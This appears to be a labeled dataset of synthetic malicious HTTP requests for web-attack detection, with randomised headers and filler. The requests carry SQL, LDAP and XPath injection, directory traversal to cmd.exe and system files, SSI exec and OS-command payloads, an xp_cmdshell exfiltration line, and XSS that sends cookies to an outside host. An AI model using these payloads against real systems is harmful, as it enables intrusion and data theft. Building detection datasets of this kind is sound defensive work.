GET /dprb3oaKliheu/xtermzCSkADWG/09@/gtNAoeku/dp/seniAa/oEerrei/wdUs/58stfA/zieistv2gd3nuhndlrt/cmrsrelyeiglivr4ohp/0rdySntydsi01ie.msf?6peaoytQoeilq5a=py&ufh=01033&nhautl7=auhyw8xo%27++++or+++1%3C+ioowsp%2Fesoynr%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D53%5D+++or+++%27oarl1r%27++++%3D%27&y8jhwh=0071&3ii=oe3o&snedyfSbE=sVtz&L24eleYlotteNt=xMAm2crdssMegi&eU6ioeafgEnse=eJKc0Uvo&e0=ih7+1b HTTP/1.0
Host: www.asnefsa.org
Connection: keep-alive
Accept: image/*;q=0.1, video/quicktime
Accept-Charset: x-mac-icelandic
Accept-Encoding: identity;q=0.9, compress;q=0.3, identity
Accept-Language: nxe-zSp;q=0.7, u-ofnpfa;q=0.3, prgEtj-Te, t-ein;q=0.9
Cache-Control: only-if-cached
Client-ip: 172.17.138.252
Cookie: ntoan9stNs=4;fesesz1en=ne-slBvaAt)tc~hbs;7dae5=tu@.@jHHnZEG;rloegftdw=mmi;1nZJahPl2szs=woe|m;iuhktaH=epLnD
Cookie2: $Version="920"
Date: Sun, 13 Dec 09 06:19:01 CET
ETag: "91bonU_8hX5Lp8pQC"
Expect: 100-continue
From: oT4sie@pMej.gov
If-Modified-Since: Wed, 25 Feb 04 10:49:38 CET
If-Unmodified-Since: Thu, 04 Jan 07 22:30:31 UTC
If-Match: "sStgjOQPpH2mAv."
If-None-Match: *
If-Range: "8WcuBMDm2pIipGgVD"
Max-Forwards: 171
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: NTLM Y3FhZWFobWFmYW5BaGRlZHRlb3Jhc2xhZTluR2xEdmxkVWNuaEl0ZW92cw==
Authorization: NTLM U2VoMXRydHllZ3J5OHNvbG0wdGlzdGFxamJrb2lvZXNnM2Rzb0Yy
Range: 115-9
Referer: http://toreno9u.uk/hnrt.doc
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: EobeONC9
UA-CPU: x86
UA-Disp: 470,303,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7313x7197
Via: 3.1 114.189.102.33, 4.8 239.225.127.206, 4.3 78.0.143.62:3721
Transfer-Encoding: elsu; iSexzRsq=nkaToA
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 509527
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49070
Start - Id: 36552
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.n4nanm.ch
Connection: twons6hc
Accept: application/*;q=0.7, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lrh5jrma-naAEc6, lXax-vz
Cache-Control: ykxh=ettht5fJ
Client-ip: 131.100.188.215
Cookie: eaase3loilmrio=588;ttn=215;n6u=5rt3.7Sp1J;wxTcD=cks;VeesexgR=uneeperl O[Ic4m%t;or7y2otR=94
Cookie2: $Version="7"
Date: Fri, 08 Dec 06 21:03:18 UTC
ETag: "._sHr99T4AKY.QbUteoU"
Expect: 100-continue
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Tue, 13 Apr 10 10:59:01 UTC
If-Unmodified-Since: Fri, 04 Apr 08 05:43:01 CET
If-Match: "lPMQwEleva0g07Cz269l"
If-None-Match: *
If-Range: Thu, 17 Aug 06 15:44:34 UTC
Max-Forwards: 72
MIME-Version: 5.7
Pragma: romm=ta
Proxy-Authorization: Digest nc=Ad95328B
Authorization: Basic b0VvUjl2YTpvcm9m
Range: -7292
Referer: http://www.deoea.st/imtd2i/g1daknh.swf
TE: trailers,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 3.7; sp-Aa; rv:0.2.1) Gecko/69657986
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 547x5195
Via: 8.6 83.226.211.193, HTTP/4.5 253.69.13.41
Transfer-Encoding: identity
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36552
Start - Id: 43473
class: OsCommanding
GET /nxnnacnsdyt9/rQco/csDmCA1tdft_VH/sXEkY.epK3_/Sn/ey5oc7u1sem/i5Zneetailo5d/sCypasswdrXfRgDs/voB4VKAco.NumS/hcvU2/ionsMicta/loru.js?acceptyjGGk0a=%27+++%3Buftp+-g+%2Fhome%2Filol%2Fsendsise++++24.208.63.37+++++%2Fis++++%3B HTTP/1.1
Host: 18.236.138.152
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 5.223.71.17
Cookie: _xS74F=28488;re6dyinrw=byo
Cookie2: $Version="2"
Date: Sat, 17 Mar 07 12:52:48 GMT
ETag: "@fPzhxW9_YYM79hlWi"
Expect: 100-continue
From: t3bs@fsiaebtorf.it
If-Modified-Since: Sat, 11 Jun 05 23:14:32 UTC
If-Unmodified-Since: Fri, 14 Jan 05 12:18:01 UTC
If-Match: *
If-None-Match: "@vpav.5.eGQq70-hJS"
If-Range: Tue, 02 Nov 04 09:59:58 UTC
Max-Forwards: 7803
MIME-Version: 9.2
Pragma: g8rIdnms=TaddltT
Proxy-Authorization: Digest username="ncuenm"
Authorization: NTLM dGtpZEdhaGFldHkxbmU4bnRodGN3c295ZWdkaGFlNWhzZXRzc3NyZ2F2MHZhZXR6
Referer: http://y2eYn.com/aaizdasO/r65tbr3/i6oo5Cr/tleUtyal/djaabi.htm
TE: trailers
Trailer: Accept-Encoding
User-Agent: ea9imLnRImmnxi
UA-CPU: Sparc
UA-Disp: 663,6446,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 333x8954
Via: 5.9 www.nnlghe.gif
Transfer-Encoding: deflate
Upgrade: nsae/6.6
Warning: 882 www.oznn.js "hraXe6sofvnt" 
----: -----------------------------

null

End - Id: 43473
Start - Id: 41156
class: SqlInjection
GET /iR5mzxnANOaJ@p/oqSE6DLLcN/TPm1s7A/eoSahyrA/5amye1ueivxhaoesngo/oUji6uRUfbXYIaq/teoi.jpg?G26l=exec+xp_cmdshell++%27bcp++++%22select+++++*+from++rs1taignse%22+queryout++pwdump.exe+++++-c++-Craw+-Shackersip++-Usa++-Ph8ck3r%27&oinsp4n=2eTCcZC&gnt37UAt3eu=ghtacces&eteanfmmajr1=o.XWw7zV&https2ISjhIzk_p=49497&tncc0te7ec=7459653&GML1Cfx.M@_tmp=escript%2B+eEbetweensos%7CN&lFmNQJbody_nF6O=469133122 HTTP/1.0
Host: www.Hf7r.ch:24905
Connection: close
Accept: text/plain;q=0.2, image/*
Accept-Charset: iso-8859-5
Accept-Encoding: identity;q=0.6, deflate;q=0.5, gzip;q=0.1, gzip;q=0.6
Accept-Language: Itaoevn-xiirlh;q=0.3, stremgw-gibs;q=0.8
Cache-Control: max-age=05673
Client-ip: 136.89.13.26
Date: Thu, 25 Nov 04 19:45:41 UTC
From: jrln@tnernm.biz
If-Unmodified-Since: Mon, 12 Mar 07 05:56:57 CET
If-Match: "bV_J1hfi.eJREC2hJE"
If-None-Match: *
Max-Forwards: 8
Authorization: NTLM dGVzdDdsb3hHcmNkeWFjZHQ4ZHF0c3RlaXhzY3NlczBmaW9kbQ==
Referer: http://www.tgtmi.st/hy1Uob/atR4jH/ta8e/eIRenslt/9seKr.avi
TE: trailers,gzip,trailers
User-Agent: n.EykE http://www.eescssr.uk
Via: 0.3 www.i02ndtyd.jpg:95
Transfer-Encoding: deflate
Warning: 341 www.hatlzo.htm "y5wl" "Thu, 19 Jun 08 12:12:06 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41156
Start - Id: 35971
class: PathTransversal
GET /dCWWOqVYM_t6Gea/inAn/tfsneeesabn0clA4mjaa/n-pO68b7a3GX/nC6_/acmE/fateueetkx8c/g8wcSm59/odbnz/uL1r-xE.cfm?ts6e=ca%28&inse=94324918&LrHxc8=6734&ltsuior=oboot.ininh&oejubt=158&ee2=%2Bftnactcigeo HTTP/1.1
Host: 23.242.146.136
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: dnit1era-hagvseu5;q=0.4
Cache-Control: max-age=047
Client-ip: 13.45.88.198
Cookie: cianaht=4aoinputcroei ;aa8e=8;saeaMnl=onugconlistegcd5i;d-window.openW4GVH=tret;airc=r:\windows\boot.ini
Cookie2: $Version="90"
Date: Fri, 28 Dec 07 20:22:37 GMT
ETag: "IIRgh_EUi@CN_xZxA."
If-Modified-Since: Fri, 24 Dec 04 19:37:19 CET
If-Unmodified-Since: Sat, 24 Dec 05 09:51:08 UTC
If-None-Match: "teh2NGQgVPBcI3La"
If-Range: Sat, 15 Dec 07 06:01:15 UTC
Max-Forwards: 19
MIME-Version: 8.5
Authorization: hvzeit eisc6ow=AMia
Referer: http://www.LwUTier.be/v1be/1ih3tn.tiff
TE: chunked
Trailer: Accept
User-Agent: Mozilla/6.9 (compatible; oeisnht; Solaris; iau4pbl; uesarue; zaTb)
UA-OS: Win9x
Via: een8/2.1 224.72.116.115
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35971
Start - Id: 40284
class: SSI
GET /XJ5INMVMQOor.mspx?tmn=oglq2iiouei&caiaLieq=l6dhz9itxtaiwp-cU&gxp_HdhD3l=%29elog2yuss&istct6fanednfh=%3C%21--+++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5CkIeiee0spq%5Coa%5C9s9Irn.exe+++++d%3A%5Cs7ypl%5Cwww.chtiro.org%5C2Detgeh%5Cdatabase.mdb+%2Fx+exporttofoxpro%22--%3E&ln6v=eer08&ies82oezwe=aon&rae=5ttg&eyseofdy4h0d4ei=saD&xumrteastmu7iee=fuae HTTP/1.1
Host: 214.148.89.202
Connection: neO7ui
Accept: audio/*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: 2m5htoi-afhK, eTe0p-oei;q=0.6, eIlo-lonide, oha0g-ia;q=0.2
Cache-Control: max-stale
Client-ip: 81.234.64.157
Cookie: .0N_yshutdownY_SR=sdLHqNAzkrYX;kiee=fntyoB0;hlrmIkcAii=enyhctcMhwinntCoda:ew;Kcoelgone=9191;wa8YES=11330624;kOStImtosu=264614
Cookie2: $Version="86"
Date: Thu, 31 Dec 09 05:16:59 CET
ETag: W/"ADBuQO9tIlPS2mf"
Expect: glFeoe
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Mon, 22 Oct 07 04:13:15 GMT
If-Match: *
If-None-Match: "ZptszONkLvdLgvg"
If-Range: Sun, 09 Jul 06 03:16:34 UTC
Max-Forwards: 9974
MIME-Version: 9.5
Pragma: s9lyr=u
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest opaque="fzlzeHe2"
Range: 37574-,839789-
Referer: /olgitof/sdiitrp/ntejTs/Luh3tTse.cgi
TE: chunked;q=0.9
Trailer: Authorization
User-Agent: nnsobar/1.3.8.6
UA-CPU: MIPS
UA-Disp: 182,511,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4714x687
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 147.185.144.226
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40284
Start - Id: 35158
class: SqlInjection
POST /tsd8eswhserrf/ntbrnaau/oeRTw_yRC0r8_ZZPG-q/g0iIU/tetekusroveeret/aseeoIlecdmwi/jM@g0DgxbQx8E-.asp? HTTP/1.1
Content-Length: 279
Content-Language: 1sseZu,iacamv
Content-Encoding: gzip
Content-Location: http://www.a3l8.de/tztu/Ue8tieij.cfm
Content-MD5: b2JjdW5uYWVsU25uclR0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 04 24:22:54 GMT
Last-Modified: Sun, 12 Jun 05 23:53:54 CET
Host: www.drnsh.cz
Connection: ae9n
Accept: */*;q=0.3
Accept-Charset: euc-cn
Accept-Encoding: compress;q=0.7, deflate;q=0.4
Accept-Language: tc-c8el, htac-r;q=0.0, vsittm-qrepil;q=0.4, ucYr-eEp;q=0.5, raor-nvnYc5
Cache-Control: max-age=2465
Client-ip: 230.250.218.171
Cookie: ibhmhmmR=u]u8Iow;inputhttp5vacceptjy=wrhiexec;aOoEfanwdotaw=cadKAaKstwoajr;D7nrafu3no=525;sas=41463573;ndh8ln7olrI=t
Cookie2: $Version="6"
Date: Thu, 25 Sep 08 13:39:12 CET
ETag: "MNa@-a68w9FVcPZY"
Expect: eel5Noee
From: obasole@fadfesnt.cz
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Tue, 03 Feb 09 05:27:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest username="e7tedn"
Authorization: NTLM cG5vZWhldjNpclR3aWZndWUzc2Vsb3RzZXFqZWZEODBlbmJqcm90d2VhbQ==
Range: 9528-,8139-
Referer: /lbuaoe4/rofensna.jsp
TE: trailers
Trailer: Host
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 3.3; i5-as; rv:6.6.6) Gecko/46842018
UA-CPU: StrongARM
UA-Disp: 2481,6599,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: hr1/3.1 www.o4s3em5e.jpeg:93456, 1.3 www.zmUtAft.html, 7.2 www.iLb7rPNa.jpeg:15025
Transfer-Encoding: deflate
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
Warning: 616 www.siai.png "ttlplonce" 
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 0448901461
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rsmrsHrsstnzd=?exdadminstyled1lcFueshN[|&t1e=ngnheqrravt&3a5F6wronn3nhsa=0N\&e5regus=teZ95a3emalpi&hyEwt9eNe=983&veitd=20516490&nlntftei=ye_&tmktRcehSZttoul=OR   'ne1o'    BETWEEN    'R'    AND   'T'&uK.IwRN=E&t7eSulascivt6=kQDi.oB35S-&2onm3xsVeshB=7669210753

End - Id: 35158
Start - Id: 37022
class: LdapInjection
GET /t6RhMZIjEpK0ntvIlQO/d4sobymnoCaothnt/5Sae8GDa0P6/8rv3Dimxzi9ip/Gyevalg@qU0lVo/at/gWofzT/tW84@TZkO-iH9J7z3h/o%uorIW6passthruq/bkokeeiArcEq/AfIUHc3/cnpP8mgODTN@OyW.mdb?2vttbrTP=900&6es9iid=mNtephp&tsnNh50e5iRmeg=ndyr+r%3AmneIhr&oe=sf%5DuE40d6position%3F+&Lrdihs=+re9ekrtl&erw=msHYkeqkU&i9desndihsd5=066%29%28%26%28objectClass%3D2pTQ%29%28%7C%28sn+%3D+++oDi%29%28cn%3Dr++J*%29%29&one10raorio=eeashrceb4vGAqeg8&KIwA=%26r%29egaccess_loga%29noid&0G.1B4W=pinedebel&oCNk=xtermo+epnl HTTP/1.1
Host: 150.187.16.13
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-kr;q=0.4, hz-gb-2312;q=0.4, iso-8859-9;q=0.5, cp-932
Accept-Encoding: identity, gzip;q=0.3, identity;q=0.8, identity;q=0.6
Accept-Language: *;q=0.0
Cache-Control: max-stale=883
Client-ip: 191.221.35.119
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="9"
Date: Tue, 30 Mar 10 02:51:52 GMT
ETag: W/"M2xwjae@G8gpcI6el9.Y"
Expect: kodtt
From: B3nrc@Ecode1.gov
If-Modified-Since: Fri, 13 Aug 04 19:53:08 UTC
If-Unmodified-Since: Mon, 05 Jul 04 07:20:50 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 06 May 10 04:44:41 GMT
Max-Forwards: 24
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: Digest uri=/oetf2ni.asmx
Range: 00177-,0-7679,-82265
Referer: http://aojsoo.org/heNw/tsoLe/gGo4sB.nsf
TE: chunked;q=0.0,chunked;q=0.6,gzip;q=0.7
Trailer: Accept-Charset
User-Agent: za7Snoe/9.7.5.1
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2678x798
Via: 0.3 155.57.232.109, 4.1 www.enlh.jpeg
Transfer-Encoding: identity
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37022
Start - Id: 46149
class: PathTransversal
GET /ecd2xRzSEsA0OPpW/5VtmpZimgqQPbgsoundL/dptadj2bs/8M/r5vEtHz4MYlxL.qWZqgV/senomslsre85yeiyr/zipuure/iZ/oAS/Hknh13rwM.swf?atKux8=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&l0uioaC2a=82&7documentNnwKz@ERTW=mHFQcrpHvrQr&nmet25ntnnne3nt=rghtstyleeoob&idlogjOJT6=2441&seen8uaOelFn8m=%7Cqhef8i&esiRibweai=eUane&zeednioo=523&ve4iat=v+iee38nkli%5D%24 HTTP/1.1
Host: www.9eIlu8A9t.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 7N7hnit-cgy7sro;q=0.7, eet-Tvhe;q=0.5
Cache-Control: max-stale=4
Client-ip: 172.17.95.67
Cookie: fWJEhfR86qE=18505;ei8oes=97195343;8oso63=327394;AtnFhaazu0a=p;etuNyfntsEeu=7UihN_WIjC
Cookie2: $Version="52"
Date: Sat, 23 May 09 19:06:37 UTC
ETag: "h5QIf9AhiTTvSnY@l75l"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sun, 01 Jan 06 01:10:49 CET
If-Unmodified-Since: Sat, 20 Feb 10 02:46:20 GMT
If-Match: "C.YfVxTZPN144LugE"
If-None-Match: *
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 0092
MIME-Version: 8.6
Pragma: i=eei
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: aror iyeebrdb=SAau
Range: 930922-
Referer: http://www.ksv0Xv.cz/lst0b.bin
TE: deflate,deflate;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.5 (compatible; Konqueror/2.9; Open BSD i386; raveys200n; yi88; 7exytitgHh)
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 9278x723
Via: 6.0 www.nslvg.png, HTTP/8.7 236.214.149.224, hrel/6.1 www.aoEJee.png
Transfer-Encoding: thho
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46149
Start - Id: 47286
class: XSS
GET /aOp/toe3thrteDasfe.cgi?n1=0553501&2cosyahazdEa0=%3Cxml+id++%3D%22++X++%22+++%3E%3Ca++%3E%3Cb++++%3E%26lt%3Bscript%3E%5Bwindow.open%28%27http%3A%2F%2F215.155.158.120%2Fsema.swf%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+%3E%3B%3C%2Fb%3E%3C%2Fa++++%3E%3C%2Fxml++++%3E HTTP/1.0
Host: 9.82.124.134
Connection: ssmU
Accept: audio/*, text/*;q=0.4, video/*
Accept-Charset: cp-936, iso-8859-2
Accept-Encoding: identity, identity, identity;q=0.3, compress;q=0.8
Accept-Language: tO-sr, yu-tnyRd;q=0.6
Cache-Control: only-if-cached
Client-ip: 150.123.138.85
Cookie: ietdp=io5t3mty5riD;nass2chnaofsst=cwrvHrrketvu(&a;svrNPu2vna=60274
Cookie2: $Version="26"
Date: Sat, 17 May 08 18:16:31 UTC
ETag: W/"jSeqzLUF58FHfui"
Expect: 100-continue
From: peTeu9@mayraae.fr
If-Modified-Since: Tue, 22 Dec 09 15:20:25 GMT
If-Unmodified-Since: Sat, 02 Jun 07 02:18:52 CET
If-Match: "Ijdfl3Cv6onbg6dETGq"
If-None-Match: "jhav@snYxsBoqBJs8YJ"
If-Range: Tue, 07 Mar 06 08:18:59 UTC
Max-Forwards: 58
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: aoettc ieuvn1n=T1or
Authorization: Digest response="A7BB157Bcc54feF1FDD2ccAbdeeDadB0"
Range: -4,7256-5,39-5314
Referer: /IA5ahe3/7h8Re/e1hci/odoobcaH/otiVc.nsf
TE: chunked;q=0.4,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: Eyeercnlfwrwersto
UA-CPU: x86
UA-Disp: 3073,5344,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5730x315
Via: 0.1 75.95.34.184:322
Transfer-Encoding: identity
Upgrade: mtnf/1.5
Warning: 047 125.243.221.59 "FolaPnotvWe1rchha" 
X-Forwarded-For: 136.201.136.92
X-Serial-Number: 41548117703
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47286
Start - Id: 40094
class: SSI
GET /LMM/na5gQIocetoihhhw/l1nimTso6dcueddeC7.png?yio=%2BahaHrdelete%5Bhrimei&ses3auesrte=%3C%21--++%23exec+++cmd%3D%22%2Fbin%2Fls+++-l++%2Fhome%2FobT7mi%2Flsu21cwa6r%22++--%3E HTTP/1.1
Host: 154.85.63.185
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1257;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 221.230.41.62
Cookie: iitohdixt=netcatphpjs sodt(rgiH?i;oeyetrlJmyog=rD;sEus4=rmd6uyneeeujo;tsadr=o6;jk4vjot0r=8
Cookie2: $Version="585"
Date: Thu, 20 Mar 08 09:38:52 UTC
ETag: "SadNG8P.EPu@j4T"
Expect: 100-continue
From: eolu8j@aioa.fr
If-Modified-Since: Sun, 05 Jul 09 12:39:32 UTC
If-Unmodified-Since: Mon, 21 Jul 08 23:00:00 CET
If-Match: *
If-None-Match: "CPj4MReygrS5Cjpl4"
If-Range: Wed, 17 Sep 08 10:43:19 UTC
Max-Forwards: 199
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: http://e1gJrj3.uk/sat6unj/Xeae9.bin
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Connection
User-Agent: Mozilla/2.5 (Windows; U; Windows NT 7.6; s3-ve; rv:0.7.3) Gecko/24891233
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: identity
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 40094
Start - Id: 41858
class: SqlInjection
GET /lu80pSBbd7eJ/fdKWMsvbodyxlogx/bL.jpeg?SaJQ=9550636&LAtj=e%29ut&swnfor816v=%27+++union+select+++++%40%40version%2C1%2C1%2C1--&gIes0nit=5tts0d+i9gchoq%7C&i3nw=3140 HTTP/1.0
Host: www.ade7aGkt.gov:80
Connection: jprsqf
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 124.36.76.191
Cookie: uhtpRHir=yswi]isr;iAsz9iBotptniwe=1eucfo9gitia;EWosi3ny6nZ=e7-E6Ztckz;noHh7cb8ctqa=58889;uttm8iihO=icTV1H
Cookie2: $Version="72"
Date: Mon, 27 Nov 06 21:39:55 UTC
ETag: "a2V9IycN6MWKRF29Nv"
Expect: rpih
From: hth8n7i@4gf4.de
If-Modified-Since: Fri, 04 Dec 09 20:35:33 UTC
If-Unmodified-Since: Sat, 17 Jul 04 03:06:19 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Mar 07 08:52:10 GMT
Max-Forwards: 7325
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: stezxe rE6Nh4eJ=t0UiMan
Range: -521,-331719
Referer: /Iwee.rar
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: dornczse (qF.SpjH)
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: 0.9 70.225.13.111
Transfer-Encoding: gzip
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41858
Start - Id: 41199
class: SqlInjection
GET /wp-phnfXWfxp_w/klatgq3e/iopi8/rtafd8oa1sica9sxbpse/ruma1Enh3.html?vgs0u9=rqO%3F%255toylutabodyb&a1thuro=w%26ipabClad+dc&la=seles&lsxTieehlnitm=oue6N_v0&nsn3la=148426 HTTP/1.1
Host: www.mHnyIjmha.gov
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-roman;q=0.3, cp-950;q=0.8, us-ascii
Accept-Encoding: '   union     select   @@version,1,1,1--
Accept-Language: cl-6E9ntLkc;q=0.8, ywi2-lh5tnp;q=0.9, Reehdvu-reni;q=0.5, kaom-N;q=0.3
Cache-Control: only-if-cached
Client-ip: 28.28.15.165
Cookie: r2o=laEsr;turclnem=e.K@lAUz_
Cookie2: $Version="6"
Date: Fri, 02 Apr 10 07:47:07 GMT
ETag: W/"EEGkhT5mI@eMWl_1"
Expect: zntAl=aettnsu;puaaigrn
From: gaduen@3hgls.net
If-Modified-Since: Thu, 17 Feb 05 18:11:01 UTC
If-Unmodified-Since: Mon, 10 Mar 08 13:05:15 UTC
If-Match: "VLk6Hk1THR8xrseFm9"
If-None-Match: "HpaNwuQLt.8twM35"
If-Range: Mon, 18 Feb 08 10:16:11 CET
Max-Forwards: 3250
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: QnNEm sle7s=ykdes
Authorization: NTLM cGRyaXRGbHRmTmVPeXZ3aHNoZHRyb290dHRwaHNMY2Fzb2F0
Range: 38-,7259-27,6749-28
Referer: /mae6WoH/apFtt.cgi
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: S3p29e/4.0.8.1.8
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9560x6945
Via: 2.9 71.4.185.68:81, 0mshp/5.6 www.s6xet.htm:04450
Transfer-Encoding: compress
Upgrade: palt/3.5, ine2/0.4
Warning: 671 80.33.40.15 "i4sm64ftefxa" "Thu, 27 Jan 05 16:05:22 CET"
X-Forwarded-For: 25.2.55.98
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41199
Start - Id: 40237
class: SSI
GET /tfttymztT8e/simvw4q9@az_e7jY-bhX/9puIwinntbnYX98/hurm/oFZxJrrYdG7AFW6/Lg2.msf? HTTP/1.1
Host: 157.240.133.241:65520
Connection: close
Accept: image/*, image/gif;q=0.7, audio/basic;q=0.8
Accept-Charset: windows-1251
Accept-Encoding: identity, deflate;q=0.5, gzip
Accept-Language: Lsalraes-bhlnt7n, efs-SePStsw8;q=0.7, irhsmhd-h6peyowh, eesmtsns-zi0ee3x;q=0.5, xihr2-xoh
Cache-Control: only-if-cached
